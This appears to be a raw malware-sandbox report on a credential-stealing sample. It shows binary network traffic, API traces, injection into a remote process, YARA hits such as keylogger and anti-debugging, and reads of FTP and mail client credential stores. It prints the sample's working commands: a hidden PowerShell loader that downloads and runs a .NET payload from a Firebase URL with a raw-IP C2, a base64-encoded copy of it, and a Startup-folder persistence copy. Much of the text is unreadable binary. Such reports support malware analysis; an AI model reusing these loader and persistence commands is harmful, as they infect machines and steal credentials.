ãÞfbV¹Y\^eq;ÈîW=ÓÒÌcQ™–Choµ"ÇôC"Áù*KÜOL!•lIž¼|} ²°*Àñ…Mþ)·¼™ÅÕóÔ⠦ڞŸ+_ŠU½.NfÐĔpÖ£µÐ1i8ž5^™÷?{ŒœÖšÇé]¢R!o0íëˆ"¬í©ô:«bö¸y?L’ +‰ÀsJüÙ·>@QxQ‚1`ñµ ïÉåêÍ`¯Ü¸4å‰Ýÿí¼{=dgÛ1P1ÓwÓ?\®\S¨×±€-¡¥¸X°õæ×^xs<‹o ±â2O—bAƒf% 01E“gú•Ò^:?äG·r%Ò ·•úK 1Ê#ÿe~ùÿ,¸<›oÇžÑÚù]ÌÙüæø"9̼Û6 #o>ôyi_·²@týÔÃôrâ;S\Ì*ȵí[7¯;.,Ôý"ˆ-…Ÿ6t©p]Ù\/6îý7îhž^Z}‡@\µ»Lž>úäϬ•4ƒ¥u{\œÆ­)üÞÆôƛ_Cš7¢¯+™KàíÐíæe5;¥,TƒËÀٔã­l\Cϓô a¹žåSÄà@ïj¡É†:@º¶†r\Š[Nì@­<.‰»Â¶‘ç¨Á;" Æ833»õD„&ç™úûÓØòi¨ŒYGÕìz[¾/‚¼å
Data received 0
Data received %Ï÷ZêÚm4¹‚C¸VcÒdιÑf €lõDŽýÅÄB$ÚÑeÑc¨'Ò4Y€ Y’pMcÛ(œ"R—Ü)={±©pÔ:U|¨Ã\$VÅ28ž-ɉǁu->½OVG44”…ÍB¯HCcÇ7©’zo¿eΐ‰Ž'7lMÿ;ZÑk OU
Data received 4Ü}‚b‹ÎÁpðѬídԃüy$©iâwøt ¥h•DÛ 8s¸j…] ®ç™¦):¬¥U‘¦šrbW÷ŠÞµÄÓÉ" S:™7!Ój—4}ÖZøTËÍ¡ˆà·§õäQÁn1>ƒygrtŸØM‡ bÙ*IÐZºýÎU¹åFðJŠr ^wb`ú{¢Š-!`~¦:âê”hKë"õ~o—©ð ‘)Ɛo;>eš݃”zhEåē´ËùIÎø¤­Ò¡ë Ϗ¯L-mr/zk%’:(ÊìúËlQó:¼a²@ÐüŸè_•fhZB®£ÁèPÐEg*š–•» !gŒ·ÙYo~’Ô*÷ãïcŽqw ǙCû˜à¿ÁVï*¸H¨Ÿþ…­4N¢…F›Uc`YdöW ÐmŠA•[ґý³  Eùìö„‡"B÷q¡*Aºâ®Æ¤ÄGR"¶¡•DªDýϱ”ÛQÉ;îÜÿÛKâø Û¶ ¢,—¿¬J¤Ê̐½”÷šZ¥?Â--ô=Œܺ³ô'®Åå+Ñ;ÇFÀ“«EëM³¯Ð Ov¾Ð¶áãÝ?lß@R)bXܵÍÕ{_I 1Ï0Ä÷üäqlÜ;j½NsJ ‚Ù+ Zµâ,§k뛠äzì8Spa³Ùa)Ŧ–e6«g¯ËÁ+80Þ‡Y AøG/ÞäB6ÔO¯›Ìõ%ÿeT3†ÖÎ#ÛëÛjIþ%‰'¦y=¸çAù$À˜)„"ŽŒá’~ìWüšløëõã²äg([.þ)[üÙS*¤…ÇÈÏå ¢“ȶ·]ñH+$>ï萒Ü?ˆˆéŸfþQò'ˆßRlŒÀN[Á$±ž$”÷wÑ`b*âÓ$~çk‹X[€E«%¡ÜIÅФÓx Ç'ü*Ó3âÌÊoSÌ ¦1÷ž¼›ü*АeµpŸ€î:;îYóNÐ>õÓ£9c˜U1ÿœVd*ù=œ:â~÷†µÅð`=HÌkÏ£âÚ·ùª·— 0Dï{Ágñ¼ËŸÇU®P”IDÀ™{Sé«ø–Æ ˜Ç”^Q3i‘¶ï×W›=“c•Í 4Ji)0W_b¬4E?ä!§¤îúvþ¥‚|´€VŒ7ÞÇK¤¨7ceBàX/x‰VŸí1ês¸žš)Õ~³ËÕa÷ãj>T#³X®ÒfrHòDlð¨SR!6Ô]•·Õ‚m“Ìó7ÌŸ@ÞˆùmwEü­|`CÓCf´©qšä|rpHT„d(õ{žáfòå"ÓeW;/7ú X³kvĂý‰`Êß`§Z^ò°x@xS°;POž~£˜s½¢rL‰>Õ2˜x•HŽÕ;ü …4Áþ!7HÉ —:::xu4¾Eï²{X@ÑwÉ]ÂÜ&þøòƒ0[¤ÑöÅҒµV c҃ì֝ñnËüz±Ö»B+ßۓe{\§A Ǔ"ÃQî&q¬Í¢ °ŒÁ‘à»3Á¥1íääô„+©Þ!"$½P¥<ò qät味Iža†äŽì+oˆ6 @
Data received ~+Ýù-ރÁ%')?\X9‹Ì-Cg^$Ü%3W˜Zú’£pI­¶‡ŽíÑ뜜$𲿞Ìԑ>÷^—ÕÀ FÍl»œ82Ȗ¹ã@ØÞ^šoϜãt°×?èÈöDhÁx ’Øñ8^e_Áé\À£NÙ³G¾Á6ÞÊQ8,ûÌH:Æ#ïƊÌI7V¸ù4¨}êÙ,¦H¼=¼9¿<~6aÔÕûIç¨ÏF!çˆYþ¿pƒÐ¿"5JA.ðFBe /Ô>@!:é¯:ž«à$Ã\àmÍ1õ–ðèśB?ÑÆJ[žÌÎNZºËfŸl"е$ûííðè°ðéÆ1Â!€ž_* ´u&³gTÎZõ>Ù±åSc…?¾•d^9㻛ôÜê•VÍÚ-ʞþÒügûx8K­}€îšl´Ìƒ-öj§s­Eá #ç:œ„Õ¶ëØBle¶«€°D¸5‰üp$hxÐåÓتd›¨¯¬l ¨³´m2ê£Up#x¢B:S tŸ¥Õ=ÓďÛcod–¥^û5¬O£‹¶Ãv &5H(¹ìϸ ðÔôéñ{NòÊS}Ã6!cPV¿hJP×2ö/˜ ™È»ËG‰ZR;ÀgÓCtŸ]å ¶Õ̎Õ##u``N',ÐW}Ì×>eŪ)!Cc[!;™é™$Ž›©FLvÎřd`ÀØÕió>>§”Júë¢Ô컌 ÆüÆJ‰úËþyG5hœœŠ*¿“‘s4uˏ·æüfÿ¶±3r8×x%†¡˜äút‘&ØN¨mWda³¿~£¸:³ÐàA?²Îò²¹_‘wì¾'í_ˆÆáÊë*k¹Ú¦_ágp •äY—àô"€©Cº€Ý,B/¹œ¡6P;QÇo‡s²¥æÊ ÉàÀ¬ûj:L‡m"Xc|ùێÈWrŽØ)¥°Ü€È—¯ðË)òÿÃÁ_ £ O©g‹yHÅa[ >k¤Ó&öJ‰*®';ÃêÕ#|?~Ù jòDÅÍ›ž¦”c‰x~0垍ô‹¼ë58;Ȩñv¥b;œø1²¡OŸ[1:oB ±=뙫qâP‹ç?KºÜ¹‡èÆ"Ïy¥¶µH9ó*.óô§ç3,((Ýï1¯7#Åñ,‘Øλ?a™ŽË‰æt¼GÁBƒ×+lÿ§éR*ó—Ç,o„ÝToIo(>øZàº.4ˆúOÝtôpþ+Zm¼iVb'`ûImº<ÑÉcòKýâ£K½âÁ¶/ D“TEü˜ke ›¾û¨SBöŸiÄÝKwm¥Ì kfÎ\Ù6×$w”’úKâ N«Q#?:"ý!¹õ"ºÈÐ7m'IÇSWN¡^sr¼£s扪ŠgtÀ-‰'¥cæƒÂ’Ý!béÙ "c²1œá§{ðèȱá¤wƧ”Ê–¿¹ Š&ez›ÍþRôT—L§j(ùm/t…Ú¯O:'ÍJ´€‰‰†Ê°µè6[ʹ£Søü× µë­<‹€»æŠX¶3Õͼf·ù¾ÙÅFÒ²ŸÏ@¦Ê­™~…‰Û#Yùh–ØäÉ>ãXJ±³[¤Š·ýúXKȪ ᫃¢­˜”êx.éÙþO÷Œiì{´`(d½>4GNÛ{ ¸Òæw÷Ê\háãOµ‘[‘·bÔ>® [0‘V;ç÷<ƒ}*¿ƒã'}^OéÚá“çÚÙ{£yÒZñJîvXEr7ºGª&.4Üò©ä~o×Ýo)èd}´®y T *yµk‘¤ØÂïæöÎ9NtXl?
Data received ®s±êû²çR( .R«|á€àA:TŒ”R)õ3ã6\´•Ѽ<Ò|OÆðBôPÃb¼ê(ùºPV5psãÂj׃XB <ÊgæTôú§Ïh,y6^ ´èÞ4~ò:`ÕÃÆâ? sFȔå¼=wÒÍ®H;åg bø3ïóۈ zŠðÿ"¡1lu&ß ÑPoñ 5՞ˆ]Ñ(ÑÀmRL‰ Xðì'3áXý |”<˜;jšÇrøÀ\Zà—÷‹­ x¤65Û(û_>£Ü౸tZñ²´ïÌ5›º˜
Data received Ìêøðvµ{@kZSɳ8êTÐéÙ*$tˆ<ò£€«¤ Uº&•š¦, BÚPi¬ˆ˜EH:Ä{€E)ˬ—[{›Œy@íáoÅÈ3ľ‹*Ýå¿ÓÛA pe¬lÅ$ÿquYUÇwWŽù:Â÷&”{²\EÈÙ×,êë/•÷–ƒpeš”®E—à°{wAU=a÷˜Cf²ò_‹8ªÂ÷&4}ÁñÃ.”»—û÷¾“j0Î!Ji¿Ïä[œ‡ê囌ÁQ~jòoŽ&8¹ý„EØZšÌó4‡RIAÙcÀàVöeÕ!ãX'û4=lOˆ—ÎKøü¼Û‹˜\jmfïñòíËôĽËOñ+§®$òðóvÌH\³–M@½Ú_ǽxû¯‰˜k” ¢r¿qþå™z@j¥•ºt¢lÙú„OA¸HÐd’Ç7®I}Þûö¾.Åp?GÕ O}¤Ê.x&VSû%\t08‹ËEfå† ò%55À¹Š Þ׋v<à]p>q¹ö³ö ,ƒ M‘>¤•ˆM8y,°±³oÿgù1o”¶:¿$­6ª|AÃ>û….˜E–Ä»ÂÀ!{k"$¬K{m—ϱÒú-˜PM7À“x/C¶|•ŸgÜ1]j¯òº"Ÿõ²1³uå«_ ' Çr, B7EMþ7Jî¦,.}ÿœäw pÄP ·X³ö‚ $Ë÷ZioA³Ìú°©‘#¬vDì…è@¬wÞYIíÒX™gáo3¹œl2bpáò=ÁƑÃÔ¶ëñz@Y:-Œñô{ÏÖ²v &SÎfO“*ÀÅrµT3b`°O›Ú3åÌnã<–¿ØÚ¦lFZIƒ,@ ©4ÈÔ쒄ŒNðVƅ)°‡ŽPH>ÐspäRÅ¤¯EäüÌ ŒÖ·ÚÔa'Û6A² xã­Ä‹âW52* Nª)s€ISwÕfŽÚ S‡¥E€¯(„Õ…S$†*’š9âµÊ½76- tš×.õcPlü££=¾7óx[ð¤&¯³ÄâÆÃP½ˆv}•k¦ Kª{Óœ¿0)ÐŝBeÙ« ~;õ{«Ä—ß cö\~›¯V*‹7GsŒÖ‘ç4&tپȰŒÃƒº”-{ÈûïžX’J3@nõfÚ#À*²b¿Z5(GkîèðnÅ=γٙ~Ÿ€Ÿ¦=éôd›ô4âO/¾…ºS¸Ò»µ×WPçM'Êï ‚š½Šz^˜°nŽH>Y„xWSÿ¤/´#ƒx$!ÂfáB©fN´ºƒ9A¿¬©¯ÎEzlŠðÝ!!ÿsN|í¡Âîm?~¹¸o(Þª+{M§G(îãl—Ó&C䊉\¿žoÏg âäm_¸Öÿìƒ }iï50:Ði_•~Ç¿7ÏR€D3ÿXœˆã(–ähÿšGÑ{§n…µ6=x1s¦ò©õÞh ø¾Qe¸| [ʖâúQ¸ÿ:;x8ƒ×ÈJœ·ùr¤9\ϋWà¦óõc¢ý'
Data received 1uk(üâ?ò‹å·/ïmF,Üðb‘îÔèÃD`ÔÚJ’#‡ZáÕ±{¨ðM1tþ`o_s֚@ôëìè>N©ædÕpUi²G`{ý®t¡¦nt¨U)whÑ]ssàà§ääño`µ“¨Ö–ÊäflFâò•ê–nÂ2œw4Ô[+°ŠJ}žn”&ֈ–¯Ù·ø¢Ò†™úIÙø­t×gvL]2°úŸ ŸBƒT…\€0~¯@{0å3/³5¤~ᎪËÇׅúòt3a)æSõä¹e,ª­÷ÎSu÷©¯ó1MÏYüX¬Zî¨ ZaÛ'8Üh¨Ô=^RµPOá'ã4;G¶æcý ›‡ Þúðoqì*^ÿÊÞõlªwˆä×µik 4ÿzύûQQç\o€ô¬Ae“\lb®Ø‡#Ž„KùŒ\¯ó:Ç°æèš>3´cC¸A]x/ô¹°;Øo9(hº‡Râþ´ÑÈëý§ÚbÀ½Ë2DÖ_@xƒQSMéъµ˜‹¶J‡0t‹$8k-݈J1Ô°0->g¤ÖÇA ÄJ,B¿ëºÇs6º¨Ÿ”±°PIªF¡½Aµ€ømmZei@Bׅ–eOÄ]/1ÀlR%CÜ'Ö¬H"Ô;fò1.3…/1·cÈ4;¦zu½W¥°*G[Ý0Òã¿:‚‰ 9lˆnV™D—½’Ú†ú}ÏîvnQD —Gh>AۙCÁóF)_àgñ‹“m(+©H»:ßèR*ƒ—Âœ­ÙMÖ­b2ÔßÉwidáX9kL%‹®»(’œ#X0qÇ WïÖ4Åö1Tfaºï^yÛrí·å½€ˆ€ä¥Ñ·Æ©C8&_rø`z].j»ã&·†‡gZÀ»ZPÇ#”Àhô‰©‘•ï^h¢cã!=§tVÏjIj$u°\®n*˜ =Ï<Twè®ÇÚ¤¦äfr¨Ú7=ç¢É±E§îV‹œ¯õåqõL5@!ÅM "÷þ1Ô±Áx¤,?à#â&~ÿ; Y°§Û{r¢Ê¤YÎ)¼Qä’+ùÐ'óÄzzþa$q‡Ss'~ª`à3ªì²Õj¼ÜMé@²:Úöê¼Ъ‹èØ#´—a–j?«Å¸6÷9¹—ˆ v¿MÓ«¼pö.« UÿÆïXãð5:Ý+1]Æv—W9ú3Ç6±âwçÂ-Ãò2ÏùçɉÒ5–™ÇJUE†ö *ÅÝ>õ2ËðVƒ:‚D|r|``g%² ÑJA Eќ¢>ƒmVàæ« ¬áy°¤Ó5ù¢"Km£«cÓà–á/îÛ¤]É&à½f/(²èŽH3n ¿ªS­òr„rö8®œV Å©æm¦î:ñ \@‰€‰Ûó‚Ï _”F]ç†ôr¨<Ì»çΌ>ö ä|{°žå‡!eu[Ûµ ëiÝ4OO[ÍH«ÏC+@¡³`½88‰¾¨2r½\Qœ}XU´¯>5¨’äÙ$š¿d€^Œ2sº®Ý,C‡â*âÔFxÀŽ¯©| mѺÃ=¡i(픅CIGRÓ¥«È¡üªJ{$5ÚÅú¬KFæ{ªUj¹rN‘?æó÷mn«ßXšfÃ6X[ïzÂ4£»Ö$å툯Ø?°±J¾ õ¯&Î頇j ˜"xC¯F¸¶Ôx#º©mÿ —Tªü?UÀø®·%ÿRB”…ÒEc–ŸŒEã鄍$JµE ië!û'Ýç,k–s©íRl”Ĩyr(M>ÿs vŊp%Ó»Ñõ)r󜏪lO…»¼¯¢8¿­=ÿ3sã
Data received ^!7ýÖ©»búGÄpëuŒº ÄÙ3h€Ýà!GPeÂõ®û˜ðlãr´OΌ+µ±N06ƒ]ó†"žÏ®•á¿LðZ^¡(˜”–n<!/îw[¤LÚ¾ä6Ø­7RN|š³œPöçÃÀF0¶7Ìí—I a)E Njn‚mÑ¥¾.†í5Èdh\å6ÂC¿Oh:#;_½¨Ãh¸ñð±ô{ìè£Æ¾JBƒß§šÓº$ÝR›Ò[yØ-—Ðúz5Ì®]¸ ÂÀ"Ni•Ê„ž•¸ý°ÿŸp5‘…ÑP:!À>ƒ´—"v¦€2¥¾J×°éâÊ%ÚÙ=þ¼.ëýºø
Data received nóõ’p…Š Dø66½-¼ð>Ûm…çP0È^¤Ø+¬ï¦ EîÕeéF¬ßÎÐÎxN‘‰1Ž~å² úXñ*Ób[Yž†d *=p>pœ¬{‡MjÆ:âØ áõZAôbE«¬r¨-ƒs Q¾õúƤÃH°»-I%5’Y¯q5À~ðWf¨ày~ê›â£@ õPžpÝ„Kð¿Æc(4ŒÆ…7Tc]Á ¾X{ŽFV)]¯"ùf·À8@Èç~‡xäÙ°t€ -“ý¹Åü½ÏÓ<%i å«òåÅäً]·´»å€sâ‚­Ã7~,“VPw%ANe[îù¨QÔOU kžšýˆ"ϛÀ¯àü.cÉkÛLéâýBAæ ©¡Hby™L31ˆ Íw(´þÑÀMAá}rëö¹h، /œÍyãŒô¿¶¼Ùf4²GÿêX˜ÁžøLÐ:Á«r>FWϽq'É·Å@!´8YnÔã«pßEQë %tu{ ÌþÎÕþn_ÀN1£³øî£8Sš9ÞÊö]tfÃJw‹n{•Éz 8ã‘J›¬)¡Ò–¢±›Û"þ‚3)µ-Xs×û»q*(7KOž832XSFëõ I/ǚløo7¢_Œ]œA}¼öE/sÒ;«CôCìl:À3琀ÐêÒöMu T-7úŒ³3 #Bvý*9nqhÛT&úŸ =CŌÎŬÿ#ûmvhñk¯>IÜßmДxP5xTÂn@>—ÿÛó0ÆE¹—#2:Î!$öð9÷ýؾˆŒúè¼ÃXÂöÚâ_ ČDÊZ6»¬kñθžß«;9›ÿ§¾SÛûbS͞7)¦’Ô¬Jg€þ™’‘)T”øÕöÂ.x ΉЖ~KOXwCë~Ÿ[4+‘ávh¥~Blêy?•Ä"EN™?sczÃuÉEÏ({´®Z™åøDM·ã¹&ʶ´›’4 3åM×i¿0Lن¡­MTÌâ4élmw&?¼õ¬ÉÿeÃl5ÏEF”4ŽˆOSÄo náôñBá'µ yº¬ë¨ß”JS`¾£V{û膇ŒñÐÄÉÔÙ=ÙkFHz҂U¯Ë?¶ŒK¢g/K"Kë€ùÃøg™Ý’æ„Þw]à¡pIsïŠÇ:îóò·ö»ü‡Ÿ¦Xƒ¶jç¼×]P1Å£Ö"N?K¢Ù›ÿ±BpDzNEÿ'îPp‡õÑÏ(_””B4¡L±O§ÆÑÚÆØÙyÿÕ:ƒ&SmUƒ.4YEÖâQ¢Ú<Œ517!$æF«ß '’ü^»*Wʯü¤ D d ‰¾ÍÞݯ_œ422þ€n þhjўÐãB~íe"@`IÅEsˆî&}^ºWå ųÆg€Ð¨Jri—ò¦F ÞK&· £_m‚îÿœ(I®qýµ‰
Data sent }e _Ý­˜ÕÔ܇ç±ú˜`›‚"#¡‰ â.ô)ËV /5 ÀÀÀ À 28<ÿ#!firebasestorage.googleapis.com  
Data sent FBA“Þi—Œøe'°"Ïx… f‰–O§ïÃ#¡º×«V.Èp§òp݉FïÊI†}f9ü†‹làÉ jŸç*×ÛÕx0žÑbJ›²Lȕ;h´>x¡{þH=Ÿ;øòhƒ§}淜Ӿük49~㧠ìé
Data sent Ð6r¦òЌtžº/íÎ o ´Lª +§såÛõ¼³˜ñ¥r&#½TՁicz ´u ÿàQpÎâ~˜ùUtÒĕŴ‡Iå¸äø×Ù?ñ,çà ÔÿjáŧK¹k‘˜½Ó7ç- ¾© YK Œú™fÕ’÷¤Y¤íÇU—¬¶²úlNèo¿uà?…&© áé˜È“^V€gäqÇß7’­š²Ø#ÖÍÇXðî”n$J²k7ám ÷=xEJQ ¯ÕïŸ
Data sent GET /window/2/Runtime.txt HTTP/1.1 Host: 198.46.178.152 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description PWS Memory rule Generic_PWS_Memory_Zero
description Communications smtp rule Network_SMTP_dotNet
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Run a KeyLogger rule KeyLogger
cmdline "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HTML.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ HoÇOOqAÇavÇrm.vbs')"
cmdline ping 127.0.0.1 -n 5
cmdline cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HTML.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ HoÇOOqAÇavÇrm.vbs')"
host 198.46.178.152
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2980
region_size: 270336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000035c
1 0 0
file C:\Users\test22\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect
file C:\Users\test22\AppData\Roaming\FTPGetter\servers.xml
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
registry HKEY_CURRENT_USER\SOFTWARE\FTPWare\COREFTP\Sites
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL­Feà 0®Í à@  @…ÈÌSàF  H.text$­ ® `.rsrcFà°@@.reloc ¶@B
base_address: 0x00400000
process_identifier: 2980
process_handle: 0x0000035c
1 1 0

WriteProcessMemory

buffer:  €P€8€€h€ à¼\ãê¼4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°StringFileInfoø000004b0,FileDescription 0FileVersion1.0.0.0t)InternalNamee5027e73-68a7-491a-b852-8635a83d4256.exe(LegalCopyright |)OriginalFilenamee5027e73-68a7-491a-b852-8635a83d4256.exe4ProductVersion1.0.0.08Assembly Version1.0.0.0<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0043e000
process_identifier: 2980
process_handle: 0x0000035c
1 1 0

WriteProcessMemory

buffer: À =
base_address: 0x00440000
process_identifier: 2980
process_handle: 0x0000035c
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2980
process_handle: 0x0000035c
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL­Feà 0®Í à@  @…ÈÌSàF  H.text$­ ® `.rsrcFà°@@.reloc ¶@B
base_address: 0x00400000
process_identifier: 2980
process_handle: 0x0000035c
1 1 0
file C:\Users\test22\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect
file C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
registry HKEY_CURRENT_USER\Software\RimArts\B2\Settings
registry HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Time & API Arguments Status Return Repeated

send

buffer: }e _Ý­˜ÕÔ܇ç±ú˜`›‚"#¡‰ â.ô)ËV /5 ÀÀÀ À 28<ÿ#!firebasestorage.googleapis.com  
socket: 1444
sent: 134
1 134 0

send

buffer: FBA“Þi—Œøe'°"Ïx… f‰–O§ïÃ#¡º×«V.Èp§òp݉FïÊI†}f9ü†‹làÉ jŸç*×ÛÕx0žÑbJ›²Lȕ;h´>x¡{þH=Ÿ;øòhƒ§}淜Ӿük49~㧠ìé
socket: 1444
sent: 134
1 134 0

send

buffer: Ð6r¦òЌtžº/íÎ o ´Lª +§såÛõ¼³˜ñ¥r&#½TՁicz ´u ÿàQpÎâ~˜ùUtÒĕŴ‡Iå¸äø×Ù?ñ,çà ÔÿjáŧK¹k‘˜½Ó7ç- ¾© YK Œú™fÕ’÷¤Y¤íÇU—¬¶²úlNèo¿uà?…&© áé˜È“^V€gäqÇß7’­š²Ø#ÖÍÇXðî”n$J²k7ám ÷=xEJQ ¯ÕïŸ
socket: 1444
sent: 213
1 213 0

send

buffer: GET /window/2/Runtime.txt HTTP/1.1 Host: 198.46.178.152 Connection: Keep-Alive
socket: 900
sent: 84
1 84 0
Process injection Process 2828 called NtSetContextThread to modify thread in remote process 2980
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4443422
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000354
process_identifier: 2980
1 0 0
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "$imageUrl = 'https://firebasestorage.googleapis.com/v0/b/server-555e5.appspot.com/o/rumpe.txt?alt=media&token=21f4cafe-e9ac-408c-a2cd-b2f926f8094a';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString($imageUrl));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.emitnuR/2/wodniw/251.871.64.891//:ptth'))"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwAyAC8AdwBvAGQAbgBpAHcALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD
parent_process wscript.exe martian_process powershell -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwAyAC8AdwBvAGQAbgBpAHc